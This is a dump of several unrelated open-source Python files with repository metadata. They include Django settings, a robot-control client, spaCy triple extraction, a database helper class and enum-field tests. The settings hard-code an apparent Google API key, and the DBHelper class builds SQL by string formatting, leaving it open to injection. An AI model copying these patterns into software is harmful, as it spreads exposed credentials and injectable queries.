u'catania-comune-ct', u'catanzaro-comune-cz', u'chieti-comune-ch', u'como-comune-co',\n u'cosenza-comune-cs', u'cremona-comune-cr', u'crotone-comune-kr', u'cuneo-comune-cn',\n u'enna-comune-en',\n u'fermo-comune-fm', u'ferrara-comune-fe', u'firenze-comune-fi', u'foggia-comune-fg',\n u'forli-comune-fc', u'frosinone-comune-fr', u'genova-comune-ge', u'gorizia-comune-go',\n u'grosseto-comune-gr',\n u'iglesias-comune-ci', u'imperia-comune-im', u'isernia-comune-is', u'lanusei-comune-og',\n u'laquila-comune-aq', u'la-spezia-comune-sp', u'latina-comune-lt', u'lecce-comune-le',\n u'lecco-comune-lc',\n u'livorno-comune-li', u'lodi-comune-lo', 
u'lucca-comune-lu', u'macerata-comune-mc',\n u'mantova-comune-mn', u'massa-comune-ms', u'matera-comune-mt', u'messina-comune-me',\n u'milano-comune-mi',\n u'modena-comune-mo', u'monza-comune-mb', u'napoli-comune-na', u'novara-comune-no',\n u'nuoro-comune-nu', u'olbia-comune-ot', u'oristano-comune-or', u'padova-comune-pd',\n u'palermo-comune-pa', u'parma-comune-pr',\n u'pavia-comune-pv', u'perugia-comune-pg', u'pesaro-comune-pu', u'pescara-comune-pe',\n u'piacenza-comune-pc', u'pisa-comune-pi', u'pistoia-comune-pt', u'pordenone-comune-pn',\n u'potenza-comune-pz',\n u'prato-comune-po', u'ragusa-comune-rg', u'ravenna-comune-ra', u'reggio-di-calabria-comune-rc',\n u'reggio-nellemilia-comune-re', u'rieti-comune-ri', u'rimini-comune-rn', u'roma-comune-rm',\n u'rovigo-comune-ro', u'salerno-comune-sa', u'sanluri-comune-vs', u'sassari-comune-ss',\n u'savona-comune-sv', u'siena-comune-si', u'siracusa-comune-sr', u'sondrio-comune-so',\n u'taranto-comune-ta',\n u'tempio-pausania-comune-ot', u'teramo-comune-te', u'terni-comune-tr', u'torino-comune-to',\n u'tortoli-comune-og', u'trani-comune-bt', u'trapani-comune-tp', u'trento-comune-tn',\n u'treviso-comune-tv',\n u'trieste-comune-ts', u'udine-comune-ud', u'urbino-comune-pu', u'varese-comune-va',\n u'venezia-comune-ve', u'verbania-comune-vb', u'vercelli-comune-vc', u'verona-comune-vr',\n u'vibo-valentia-comune-vv', u'vicenza-comune-vi', u'villacidro-comune-vs', u'viterbo-comune-vt']\n\n##\n# OP API VARIABLES:\n##\n\nOP_BLOG_CATEGORY = 'neibilanci'\nOP_API_DOMAIN = env('OP_API_DOMAIN')\nOP_API_USERNAME = env('OP_API_USERNAME')\nOP_API_PASSWORD = env('OP_API_PASSWORD')\n\n##\n# COOKIES\n# expiration time for a data in a session (seconds)\n##\n\nSESSION_COOKIE_AGE = 7200\nSESSION_SAVE_EVERY_REQUEST = True\n\n##\n# TIMELINE VARIABLES:\n# set the start / end of the time span considered\n##\n\nAPP_DATE_FMT = '%Y-%m-%d'\n\nAPP_START_YEAR = 2005\nAPP_END_YEAR = 2015\nAPP_START_DATE = datetime.strptime(\"{0}-01-01\".format(APP_START_YEAR), APP_DATE_FMT)\nAPP_END_DATE = datetime.strptime(\"{0}-12-31\".format(APP_END_YEAR), APP_DATE_FMT)\n\nLAST_VALID_CONSUNTIVO_YEAR = 2013\nCLASSIFICHE_START_YEAR = APP_START_DATE.year\nCLASSIFICHE_END_YEAR = LAST_VALID_CONSUNTIVO_YEAR\n\nTERRITORI_CONTEXT_REFERENCE_YEAR = CLASSIFICHE_END_YEAR\n\n##\n# BILANCIO GRAPHS VARIABLES:\n# set the start / end of the Sindaci timeline and line graphs in the Bilancio Pages\n##\n\n\n# define lines color of the SINDACO marker on the timeline\nINCARICO_MARKER_INACTIVE = '#b9c6c4'\nINCARICO_MARKER_DUMMY = '/static/img/incarico_dummy.png'\nINCARICO_MARKER_COMMISSARIO = '/static/img/commissario.png'\n\n# defines the color of the line graph\nTERRITORIO_1_COLOR = '#cc6633'\nTERRITORIO_2_COLOR = '#a51206'\n\nCLUSTER_LINE_COLOR = '#f7b5a1'\n\nDEFAULT_INDICATOR_SLUG = 'autonomia-finanziaria'\nDEFAULT_VOCE_SLUG_CONFRONTI = 'consuntivo-entrate-cassa-imposte-e-tasse'\nDEFAULT_VOCE_SLUG_CLASSIFICHE = DEFAULT_VOCE_SLUG_CONFRONTI\n\nINDICATOR_COLORS = ['#cc6633',\n '#f7da94',\n '#913d6a',\n '#999924',\n '#993527',\n '#c3a150',\n '#666c14',\n '#5f6b78',\n '#e2a8b0',\n '#c6d041']\n\n# euros range to define two sums equal\n# due to round of floats to integers,\n# can be as large as 10\nNEARLY_EQUAL_THRESHOLD = 10\n\n# LOGIN_URL defines the name of the view to be called\n# when an unauthorized user tries to access a passw-protected view\nLOGIN_URL = 'login'\n\n# defines Mailbin server address to push temporary home page form user data\nMAILBIN_SERVER_HOST = 'mailbin.openpolis.it'\nMAILBIN_QUEUE_ADDR = 
\"tcp://{0}:5558\".format(MAILBIN_SERVER_HOST)\nGOOGLE_SHORTENER_API_KEY = 'AIzaSyAzTAcojoJMKV3eh8XAsE3CP7hpgmms17M'\nGOOGLE_SHORTENER_URL = \"https://www.googleapis.com/urlshortener/v1/url\"\n\nTINYMCE_DEFAULT_CONFIG = {'theme': \"advanced\", 'relative_urls': False}\n\n# voce bilancio slugs of funzioni sum branches\nPREVENTIVO_SOMMA_SPESE_FUNZIONI_SLUG = 'preventivo-spese-spese-somma-funzioni'\nCONSUNTIVO_SOMMA_SPESE_FUNZIONI_SLUG = 'consuntivo-spese-cassa-spese-somma-funzioni'\nCONSUNTIVO_SPESE_INVESTIMENTI_INTERVENTI_SLUG = 'consuntivo-spese-cassa-spese-per-investimenti-interventi'\nCONSUNTIVO_SPESE_CORRENTI_INTERVENTI_SLUG = 'consuntivo-spese-cassa-spese-correnti-interventi'\n\nHOSTS_COMUNI=[]\n\nCLASSIFICHE_PAGINATE_BY = 15\nEARLYBIRD_ENABLE = env.bool('EARLYBIRD_ENABLE')\n\nENABLED_STATIC_PAGES = [\n 'faq',\n 'indicatori',\n 'bilancio_comune',\n 'mappa',\n 'confronti',\n 'classifiche',\n 'software',\n 'licenze',\n 'informativa',\n 'credits',\n]\n","repo_name":"DeppSRL/open_bilanci","sub_path":"bilanci_project/bilanci/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":18577,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"32639801767","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom urllib.request import urlopen \nimport json\nimport websocket\nimport _thread\nimport grpc\nimport sys\nfrom code_engine_client import bot_api_conn_grpc_pb2\nfrom code_engine_client import bot_api_conn_grpc_pb2_grpc\nimport sys\nimport importlib\nfrom concurrent.futures import ThreadPoolExecutor\n\n\n\nclass CodeEngineClient:\n bot_config_url = \"https://apps-1254429489.cos.ap-beijing.myqcloud.com/enable_bot/enable_bot_config.json\"\n event_ws_url = \"ws://jimugaoshou.com:50510/code\"\n cmd_svr_url = \"jimugaoshou.com:50501\"\n\n def __init__(self, openid, id):\n self.openid = openid\n self.id = id\n self.bot_config_map = {}\n self.drive_config_map = {}\n self.cmd_client = None\n self.event_client = None\n self.threads = None\n\n # outter functions\n def init(self):\n self.load_bot_config()\n self.load_drive_config()\n\n def run(self):\n self.init_net()\n self.init_threads()\n self.event_client.run_forever()\n\n def cmd_motor(self, bot_index, tag, x):\n print(\"cmd_motor\")\n msg = self.format_cmd_motor_msg(bot_index, tag, x)\n self.send_cmd_msg(msg)\n\n def cmd_led(self, bot_index, tag, x):\n print(\"cmd_led\")\n msg = self.format_cmd_led_msg(bot_index, tag, x)\n self.send_cmd_msg(msg)\n\n # end outter functions\n\n\n # inner functions\n def init_net(self):\n self.cmd_client = self.init_cmd_client()\n self.event_client = self.init_event_client()\n\n # share cmd client, and not init event client, just for code engine svr\n def attach_net(self, cmd_client):\n self.cmd_client = cmd_client\n\n # thread pool\n def init_threads(self):\n self.threads = ThreadPoolExecutor(max_workers=10)\n\n def load_bot_config(self):\n self.bot_config_map = self.get_json_from_url(CodeEngineClient.bot_config_url)\n\n def load_drive_config(self):\n url = \"https://imgs-1254429489.cos.ap-beijing.myqcloud.com/drive/\"+self.openid+\"/\"+self.id+\".json\"\n self.drive_config_map = self.get_json_from_url(url)\n\n def get_json_from_url(self, url):\n html = urlopen(url)\n data = html.read()\n return json.loads(data)\n\n def init_cmd_client(self):\n print(\"init_cmd_client\")\n channel = grpc.insecure_channel(CodeEngineClient.cmd_svr_url)\n return bot_api_conn_grpc_pb2_grpc.BotApiConnGrpcStub(channel)\n\n def init_event_client(self):\n 
websocket.enableTrace(True)\n return websocket.WebSocketApp(CodeEngineClient.event_ws_url,\n on_open=self.event_on_open,\n on_message=self.event_on_message,\n on_error=self.event_on_error,\n on_close=self.event_on_close)\n\n def event_on_open(self, ws):\n print(\"event_on_open\")\n self.send_event_init_msg(ws)\n\n def event_on_message(self, ws, message):\n print(\"event_on_message\")\n msg = json.loads(message)\n\n if msg[\"cmd\"] == \"event\":\n self.event_loop(msg)\n\n def event_on_error(self, ws, error):\n print(\"event_on_error\")\n\n def event_on_close(self, ws, close_status_code, close_msg):\n print(\"event_on_close\")\n\n def event_loop(self, msg):\n print(\"event_loop\")\n\n if msg[\"cmd\"] == \"event\":\n self.process_event(msg)\n elif msg[\"cmd\"] == \"sensor\":\n self.process_sensor(msg)\n\n def process_event(self, msg):\n module_name = self.get_local_module_name()\n function_name, param_cnt = self.get_function_name(msg[\"seq\"])\n\n if function_name != \"\":\n fun_path = module_name+\".\"+function_name\n self.threads.submit(self.dynamic_run, fun_path, param_cnt, msg[\"x\"], msg[\"y\"],'','','','')\n else:\n print(\"unknown msg\")\n\n\n def process_sensor(self, msg):\n module_name = self.get_local_module_name()\n function_name, param_cnt = self.get_sensor_function_name(msg[\"model\"])\n\n if function_name != \"\":\n fun_path = module_name+\".\"+function_name\n\n if msg[\"model\"] == \"line\":\n self.threads.submit(self.dynamic_run, fun_path, param_cnt, msg[\"result\"][\"exist\"], msg[\"result\"][\"offset\"],'','','','')\n elif msg[\"model\"] == \"color\":\n self.threads.submit(self.dynamic_run, fun_path, param_cnt, msg[\"result\"][\"r\"], msg[\"result\"][\"g\"],msg[\"result\"][\"b\"],'','','')\n elif msg[\"model\"] == \"qrcode\":\n self.threads.submit(self.dynamic_run, fun_path, param_cnt, msg[\"result\"][\"url\"], '','','','','')\n elif msg[\"model\"] == \"tflite\":\n self.threads.submit(self.dynamic_run, fun_path, param_cnt, msg[\"result\"][\"label\"], msg[\"result\"][\"confidence\"],msg[\"result\"][\"x\"],msg[\"result\"][\"y\"],msg[\"result\"][\"w\"],msg[\"result\"][\"h\"])\n\n else:\n print(\"unknown msg\")\n\n\n def get_local_module_name(self):\n filename = sys.argv[0].split('/')[-1][0:-3]\n return filename\n\n def get_seq_function_name(self, seq):\n\n param_cnt = 1\n function_name = \"\"\n for unit in self.drive_config_map[\"units\"]:\n if unit['seq'] == seq:\n if unit['ui']['type'] == \"joystick\":\n param_cnt = 2\n\n function_name = \"on_event_\"+unit['ui']['type']+\"_\"+str(seq)\n\n return function_name, param_cnt\n\n def get_sensor_function_name(self, model):\n param_cnt = 1\n function_name = \"\"\n\n if model == \"line\":\n param_cnt = 2\n function_name = \"on_sensor_line\"\n elif model == \"color\":\n param_cnt = 3\n function_name = \"on_sensor_color\"\n elif model == \"tflite\":\n param_cnt = 6\n function_name = \"on_sensor_tflite\"\n elif model == \"qrcode\":\n param_cnt = 1\n function_name = \"on_sensor_qrcode\"\n\n return function_name, param_cnt\n\n\n def reload_module(self, module_path):\n\n tmp = importlib.util.find_spec(module_path)\n if tmp == None:\n return None\n\n tmp = importlib.import_module(module_path)\n importlib.reload(tmp)\n\n return tmp\n\n def dynamic_run(self, fun_path, param_cnt, x1, x2, x3, x4, x5, x6):\n\n # try:\n module_path = fun_path.split('.')[0]\n fun_name = fun_path.split('.')[1]\n\n mod = self.reload_module(module_path)\n\n if hasattr(mod, fun_name):\n if param_cnt == 1:\n eval(\"mod.\"+fun_name)(self, x1)\n elif param_cnt == 2:\n 
eval(\"mod.\"+fun_name)(self, x1, x2)\n elif param_cnt == 3:\n eval(\"mod.\"+fun_name)(self, x1, x2, x3)\n elif param_cnt == 4:\n eval(\"mod.\"+fun_name)(self, x1, x2, x3, x4)\n elif param_cnt == 5:\n eval(\"mod.\"+fun_name)(self, x1, x2, x3, x4, x5)\n elif param_cnt == 6:\n eval(\"mod.\"+fun_name)(self, x1, x2, x3, x4, x5, x6)\n else:\n print(\"Error, no such function : \"+fun_path)\n\n # except:\n # print(\"Error dynamic_run, fun_path : \"+fun_path+\", params : \"+str(x1))\n\n\n def send_event_init_msg(self, ws):\n msg = {\"openid\": self.openid, \"id\": self.id, \"cmd\":\"init\"}\n data = json.dumps(msg)\n ws.send(data)\n\n\n def format_cmd_motor_msg(self, bot_index, tag, x):\n\n a1, a2 = self.get_pins_of_tag(tag)\n\n # format cmd\n msg = {\n \"app_version\":\"1.0.0\",\n \"app_os\": \"api\",\n \"openid\": self.openid,\n \"cmd\": \"base\",\n \"bot_id\": self.get_bot_id_of_index(bot_index),\n \"a1\": a1,\n \"a2\": a2,\n \"speed\": x\n }\n\n return msg\n\n def format_cmd_led_msg(self, bot_index, tag, x):\n # format cmd\n a1, a2 = self.get_pins_of_tag(tag)\n\n # format cmd\n msg = {\n \"app_version\":\"1.0.0\",\n \"app_os\": \"api\",\n \"openid\": self.openid,\n \"cmd\": \"base\",\n \"bot_id\": self.get_bot_id_of_index(bot_index),\n \"a1\": a1,\n \"a2\": a2,\n \"speed\": x\n }\n\n return msg\n\n def get_pins_of_tag(self, tag):\n return self.bot_config_map['control_bot']['base'][tag+'1'], self.bot_config_map['control_bot']['base'][tag+'2']\n\n def get_bot_id_of_index(self, bot_index):\n bots = self.drive_config_map[\"bots\"]\n if bot_index < len(bots):\n return bots[bot_index]\n else:\n return \"\"\n\n def send_cmd_msg(self, msg):\n # format req\n req = bot_api_conn_grpc_pb2.SendBotMsgRequest(openid = msg[\"openid\"], bot_id = msg[\"bot_id\"], cmd = msg[\"cmd\"], msg = json.dumps(msg))\n\n # send msg\n resp = self.cmd_client.SendBotMsg(req)\n\n\n # end inner functions\n","repo_name":"moc-master/code_engine_client","sub_path":"code_engine_client/code_engine_client.py","file_name":"code_engine_client.py","file_ext":"py","file_size_in_byte":8114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3029890456","text":"from spacy.tokens import Span\nfrom spacy.parts_of_speech import CONJ, DET, NOUN, VERB\nimport itertools\n\nSUBJ_DEPS = {\"agent\", \"csubj\", \"csubjpass\", \"expl\", \"nsubj\", \"nsubjpass\"}\nOBJ_DEPS = {\"attr\", \"dobj\", \"dative\", \"oprd\"}\nAUX_DEPS = {\"aux\", \"auxpass\", \"neg\"}\n\n\ndef get_main_verbs_of_sent(sent):\n \"\"\"Return the main (non-auxiliary) verbs in a sentence.\"\"\"\n return [\n tok for tok in sent if tok.pos == VERB and tok.dep_ not in AUX_DEPS\n ]\n\n\ndef get_subjects_of_verb(verb):\n \"\"\"Return all subjects of a verb according to the dependency parse.\"\"\"\n subjs = [tok for tok in verb.lefts if tok.dep_ in SUBJ_DEPS]\n # get additional conjunct subjects\n subjs.extend(tok for subj in subjs for tok in _get_conjuncts(subj))\n return subjs\n\n\ndef get_objects_of_verb(verb):\n \"\"\"\n Return all objects of a verb according to the dependency parse,\n including open clausal complements.\n \"\"\"\n objs = [tok for tok in verb.rights if tok.dep_ in OBJ_DEPS]\n # get open clausal complements (xcomp)\n objs.extend(tok for tok in verb.rights if tok.dep_ == \"xcomp\")\n # get additional conjunct objects\n objs.extend(tok for obj in objs for tok in _get_conjuncts(obj))\n return objs\n\n\ndef _get_conjuncts(tok):\n \"\"\"\n Return conjunct dependents of the leftmost conjunct in a coordinated 
phrase,\n e.g. \"Burton, [Dan], and [Josh] ...\".\n \"\"\"\n return [right for right in tok.rights if right.dep_ == \"conj\"]\n\n\ndef get_span_for_compound_noun(noun):\n \"\"\"\n Return document indexes spanning all (adjacent) tokens\n in a compound noun.\n \"\"\"\n min_i = noun.i - sum(\n 1\n for _ in itertools.takewhile(\n lambda x: x.dep_ == \"compound\", reversed(list(noun.lefts))\n )\n )\n return (min_i, noun.i)\n\n\ndef get_span_for_verb_auxiliaries(verb):\n \"\"\"\n Return document indexes spanning all (adjacent) tokens\n around a verb that are auxiliary verbs or negations.\n \"\"\"\n min_i = verb.i - sum(\n 1\n for _ in itertools.takewhile(\n lambda x: x.dep_ in AUX_DEPS, reversed(list(verb.lefts))\n )\n )\n max_i = verb.i + sum(\n 1\n for _ in itertools.takewhile(\n lambda x: x.dep_ in AUX_DEPS, verb.rights\n )\n )\n return (min_i, max_i)\n\n\ndef subject_verb_object_triples(doc):\n \"\"\"\n Extract an ordered sequence of subject-verb-object (SVO) triples from a\n spacy-parsed doc. Note that this only works for SVO languages.\n\n Args:\n doc (:class:`spacy.tokens.Doc` or :class:`spacy.tokens.Span`)\n\n Yields:\n Tuple[:class:`spacy.tokens.Span`]: The next 3-tuple of spans from ``doc``\n representing a (subject, verb, object) triple, in order of appearance.\n \"\"\"\n # TODO: What to do about questions, where it may be VSO instead of SVO?\n # TODO: What about non-adjacent verb negations?\n # TODO: What about object (noun) negations?\n if isinstance(doc, Span):\n sents = [doc]\n else: # spacy.Doc\n sents = doc.sents\n\n for sent in sents:\n start_i = sent[0].i\n\n verbs = get_main_verbs_of_sent(sent)\n for verb in verbs:\n subjs = get_subjects_of_verb(verb)\n if not subjs:\n continue\n objs = get_objects_of_verb(verb)\n if not objs:\n continue\n\n # add adjacent auxiliaries to verbs, for context\n # and add compounds to compound nouns\n verb_span = get_span_for_verb_auxiliaries(verb)\n verb = sent[verb_span[0] - start_i : verb_span[1] - start_i + 1]\n for subj in subjs:\n subj = sent[\n get_span_for_compound_noun(subj)[0]\n - start_i : subj.i\n - start_i\n + 1\n ]\n for obj in objs:\n if obj.pos == NOUN:\n span = get_span_for_compound_noun(obj)\n elif obj.pos == VERB:\n span = get_span_for_verb_auxiliaries(obj)\n else:\n span = (obj.i, obj.i)\n obj = sent[span[0] - start_i : span[1] - start_i + 1]\n\n yield (subj.text, verb.text, obj.text)","repo_name":"phueb/AOCHILDESComplexity","sub_path":"aochildescomplexity/svo.py","file_name":"svo.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28630744286","text":"data = [0] * 257\n\ndef perms(x):\n if 1 <= x <= 97:\n return x + 159\n if 98 <= x <= 131:\n return x + 28\n if 132 <= x <= 256:\n return x - 131\n \n\ncounter = 0\nprint(\"$$1 \", end=\"\")\na, b = 1, perms(1)\nwhile b != 1:\n print(\"\\\\xrightarrow{\" + str(counter) + \"}\", b, end=\" \")\n a, b = b, perms(b)\n counter += 1\nprint(\"$$\", counter)\n \n\n","repo_name":"artoftheblue/hse-homeworks","sub_path":"linear algebra/idz3.py","file_name":"idz3.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8520984761","text":"import logging\nimport copy\n\nclass DBHelper(object):\n\n def __init__(self, context, table_name, structure):\n self.context = context\n self.table_name = table_name\n self.structure = structure\n\n @staticmethod\n def safe_float(txt):\n try:\n return 
float(txt)\n except:\n return -1\n\n @staticmethod\n def safe_int(txt):\n try:\n return int(float(txt))\n except:\n return -1\n\n def get_empty_row(self):\n return copy.deepcopy(self.structure)\n\n @staticmethod\n def format_value(value, type):\n if type == 'TEXT' or type == 'BLOB':\n return '\"{}\"'.format(value)\n else:\n return value\n\n @staticmethod\n def gen_select(select_struct):\n select_sql = '*'\n for colname, col in select_struct.items():\n if DBHelper.is_entered(col):\n if select_sql == '*':\n select_sql = '{} '.format(colname)\n else:\n select_sql = '{}, {}'.format(select_sql, colname)\n return select_sql\n\n @staticmethod\n def is_entered(col):\n if type(col['value']) == str:\n if len(col['value']) > 0:\n return True\n else:\n if col['value'] > -1:\n return True\n return False\n\n @staticmethod\n def gen_where(where_struct):\n where_sql = None\n for colname, col in where_struct.items():\n if DBHelper.is_entered(col):\n if where_sql:\n where_sql = '{} AND {} = {} '.format(where_sql, colname,\n DBHelper.format_value(col['value'], col['type']))\n else:\n where_sql = '{} = {}'.format(colname, DBHelper.format_value(col['value'], col['type']))\n return where_sql\n\n @staticmethod\n def gen_set(where_struct):\n set_sql = None\n for colname, col in where_struct.items():\n if DBHelper.is_entered(col):\n if set_sql:\n set_sql = '{}, {} = {} '.format(set_sql, colname,\n DBHelper.format_value(col['value'], col['type']))\n else:\n set_sql = '{} = {}'.format(colname, DBHelper.format_value(col['value'], col['type']))\n return set_sql\n\n @staticmethod\n def gen_col_list(fields):\n col_sql = None\n for colname, col in fields.items():\n if DBHelper.is_entered(col):\n if col_sql:\n col_sql = '{}, {}'.format(col_sql, colname)\n else:\n col_sql = '{}'.format(colname)\n return col_sql\n\n @staticmethod\n def gen_value_list(fields):\n col_sql = None\n for colname, col in fields.items():\n if DBHelper.is_entered(col):\n if col_sql:\n col_sql = '{}, {}'.format(col_sql, DBHelper.format_value(col['value'], col['type']))\n else:\n col_sql = '{}'.format(DBHelper.format_value(col['value'], col['type']))\n return col_sql\n\n def select(self, where_dict, select_dict={}):\n full_sql = 'SELECT {} FROM {} WHERE {};'.format(DBHelper.gen_select(select_dict),\n self.table_name,\n DBHelper.gen_where(where_dict))\n return self.context.query(full_sql)\n\n def sql(self, sql):\n return self.context.query(sql)\n\n def update_insert(self, key, update):\n existing = self.context.query('SELECT * FROM {} WHERE {};'.format(self.table_name, DBHelper.gen_where(key)))\n if len(existing) > 0:\n self.update(key, update)\n else:\n if len(key['id']['value']) < 1:\n new_key = None\n for colname, col in key.items():\n if len(col['value']) > 0:\n if new_key:\n new_key = \"{}-{}\".format(new_key, col['value'])\n else:\n new_key = \"{}\".format(col['value'])\n key['id']['value'] = new_key\n all_fields = copy.deepcopy(key) # start with x's keys and values\n for colname, col in all_fields.items():\n if len(\"{}\".format(update[colname]['value'])) > 0:\n all_fields[colname]['value'] = update[colname]['value']\n insert_sql = 'INSERT INTO {}({}) VALUES({});'.format(self.table_name,\n DBHelper.gen_col_list(all_fields),\n DBHelper.gen_value_list(all_fields))\n self.context.query(insert_sql)\n\n def update(self, key, update):\n update_sql = 'UPDATE {} SET {} WHERE {}'.format(self.table_name,\n DBHelper.gen_set(update),\n DBHelper.gen_where(key))\n self.context.query(update_sql)\n\n def get_by_id(self, id):\n row_match = self.get_empty_row()\n 
row_match['id']['value'] = id\n results = self.select(row_match)\n if len(results) > 0:\n rv = {}\n cnt = 0\n for colname, col in self.structure.items():\n rv[colname] = results[0][cnt]\n cnt = cnt + 1\n return rv\n else:\n return None\n\n def get_by_name(self, name):\n row_match = self.get_empty_row()\n row_match['name']['value'] = name\n results = self.select(row_match)\n\n if len(results) > 0:\n rv = {}\n cnt = 0\n for colname, col in self.structure.items():\n rv[colname] = results[0][cnt]\n cnt = cnt + 1\n return rv\n else:\n return None\n\n def dict_from_itter(self, itter):\n result = {}\n cnt = 0\n for colname, col in self.structure.items():\n result[colname] = itter[cnt]\n cnt = cnt + 1\n return result\n\n\n def get_all(self):\n db_results = self.sql('select * from {};'.format(self.table_name))\n results = []\n for db_result in db_results:\n results.append(self.dict_from_itter(db_result))\n return results\n","repo_name":"healthyit/brickv2","sub_path":"entities/db_helper.py","file_name":"db_helper.py","file_ext":"py","file_size_in_byte":6464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27985200686","text":"from django.db import connection\n\nimport pytest\n\nfrom .enums import Color, IntegerEnum, LabeledEnum, Taste, ZeroEnum\nfrom .models import MyModel\n\n\n@pytest.mark.django_db\ndef test_field_value():\n m = MyModel(color=Color.RED)\n m.save()\n assert m.color == Color.RED\n\n m = MyModel.objects.filter(color=Color.RED)[0]\n assert m.color == Color.RED\n\n # Passing the value should work the same way as passing the enum\n assert Color.RED.value == 'r'\n m = MyModel.objects.filter(color='r')[0]\n assert m.color == Color.RED\n\n with pytest.raises(ValueError):\n MyModel.objects.filter(color='xx')[0]\n\n\ndef test_descriptor():\n assert MyModel.color.field.enum is Color\n\n\n@pytest.mark.django_db\ndef test_db_value():\n m = MyModel(color=Color.RED)\n m.save()\n cursor = connection.cursor()\n cursor.execute('SELECT color FROM %s WHERE id = %%s' % MyModel._meta.db_table, [m.pk])\n assert cursor.fetchone()[0] == Color.RED.value\n\n\n@pytest.mark.django_db\ndef test_enum_int_field_validators():\n if not hasattr(connection.ops, 'integer_field_range'):\n return pytest.skip('Needs connection.ops.integer_field_range')\n\n # Make sure that integer_field_range returns a range.\n # This is needed to make SQLite emulate a \"real\" db\n orig_method = connection.ops.integer_field_range\n connection.ops.integer_field_range = (lambda *args: (-100, 100))\n\n m = MyModel(color=Color.RED)\n\n # Uncache validators property of taste_int\n for f in m._meta.fields:\n if f.name == 'taste_int':\n if 'validators' in f.__dict__:\n del f.__dict__['validators']\n\n # Run the validators\n m.full_clean()\n\n # Revert integer_field_range method\n connection.ops.integer_field_range = orig_method\n\n\n@pytest.mark.django_db\ndef test_zero_enum_loads():\n # Verifies that we can save and load enums with the value of 0 (zero).\n m = MyModel(zero=ZeroEnum.ZERO, color=Color.GREEN)\n m.save()\n assert m.zero == ZeroEnum.ZERO\n assert m.zero2 == ZeroEnum.ZERO\n\n m = MyModel.objects.get(id=m.id)\n assert m.zero == ZeroEnum.ZERO\n assert m.zero2 == ZeroEnum.ZERO\n\n\n@pytest.mark.django_db\ndef test_int_enum():\n m = MyModel(int_enum=IntegerEnum.A, color=Color.RED)\n m.save()\n\n m = MyModel.objects.get(id=m.id)\n assert m.int_enum == IntegerEnum.A\n assert isinstance(m.int_enum, IntegerEnum)\n\n\ndef test_serialization():\n from 
django.core.serializers.python import Serializer as PythonSerializer\n m = MyModel(color=Color.RED, taste=Taste.SALTY)\n ser = PythonSerializer()\n ser.serialize([m])\n fields = ser.getvalue()[0][\"fields\"]\n assert fields[\"color\"] == m.color.value\n assert fields[\"taste\"] == m.taste.value\n\n\n@pytest.mark.django_db\ndef test_nonunique_label():\n obj = MyModel.objects.create(\n color=Color.BLUE,\n labeled_enum=LabeledEnum.FOOBAR\n )\n assert obj.labeled_enum is LabeledEnum.FOOBAR\n\n obj = MyModel.objects.get(pk=obj.pk)\n assert obj.labeled_enum is LabeledEnum.FOOBAR\n","repo_name":"hzdg/django-enumfields","sub_path":"tests/test_django_models.py","file_name":"test_django_models.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"37"} +{"seq_id":"14605891289","text":"\"\"\"Avatar utilities and generic definitions\r\n\r\nThis module defines base classes for representing avatar body parts and defines\r\nthe properties and behavior of avatars and body parts\r\n\"\"\"\r\n\r\nfrom enum import Enum\r\nfrom math import log2, ceil\r\nfrom abc import abstractmethod, ABC\r\nfrom functools import reduce\r\nfrom random import randint, choice\r\nfrom utils.colors import COLOR_NAMES\r\n\r\n\"\"\" Enum for encoding the base units of DNA \"\"\"\r\nDNANucleotide = Enum('DNANucleotide', 'C G A T', start=0)\r\n\r\n# number of bits a number in [0, x) takes to represent\r\ndef _bit_length(x): return int(ceil(log2(x)))\r\n\r\n\r\nclass BodyPart(ABC):\r\n \"\"\"Abstract base class for body parts\r\n \r\n This is an abstract class, do not instansiate it.\r\n\r\n \r\n Attributes:\r\n variation (int, optional): the shape variation of the body part.\r\n Optional only if the VARIATIONS parameter is 1 (a single variation is possible)\r\n color (str, optional): the color name of the part. 
Should be supplied if and\r\n only if the IS_COLORABLE parameter is True.\r\n \"\"\"\r\n COLOR_BIT_LEN = 6 # length in bits a color selection\r\n\r\n @property\r\n @abstractmethod\r\n def VARIATIONS():\r\n \"\"\"how many different structure types can a body part have\"\"\"\r\n pass\r\n\r\n @property\r\n @abstractmethod\r\n def IS_COLORABLE():\r\n \"\"\"is the body part color-dependent and can be colored\"\"\"\r\n pass\r\n\r\n @classmethod\r\n def bit_len(cls):\r\n \"\"\"The size a body part takes up in bits\r\n\r\n Returns:\r\n int: amount of bits a bitstring representation of this part takes\r\n \"\"\"\r\n cls_len = _bit_length(cls.VARIATIONS)\r\n if cls.IS_COLORABLE:\r\n cls_len += cls.COLOR_BIT_LEN\r\n return cls_len\r\n\r\n def __init__(self, variation=None, color=None):\r\n if variation is None:\r\n assert self.VARIATIONS == 1, \\\r\n \"variation must be specified if and only if the body part has more than 1 variations\"\r\n variation = 0\r\n assert (0 <= variation < self.VARIATIONS), \\\r\n f\"variation must be between 0 (inclusive) and {self.VARIATIONS} (exclusive)\"\r\n assert (color is None) == (not self.IS_COLORABLE), \\\r\n \"color must be specified if and only if the body part is colorable\"\r\n self.variation = variation\r\n self.color = color\r\n \r\n def __repr__(self):\r\n part_name = self.__class__.__name__\r\n if self.IS_COLORABLE:\r\n return f\"{part_name}(variation={self.variation!r}, color={COLOR_NAMES.index(self.color)!r})\"\r\n return f\"{part_name}(variation={self.variation!r})\"\r\n\r\n def _encode_variation(self):\r\n if self.VARIATIONS == 1:\r\n return \"\"\r\n return f\"{self.variation:0b}\".zfill(_bit_length(self.VARIATIONS))\r\n\r\n @classmethod\r\n def _decode_variation(cls, decode_string):\r\n if len(decode_string) == 0:\r\n return None\r\n return int(decode_string, 2)\r\n\r\n def _encode_color(self):\r\n if not self.IS_COLORABLE:\r\n return \"\"\r\n color_index = COLOR_NAMES.index(self.color)\r\n return 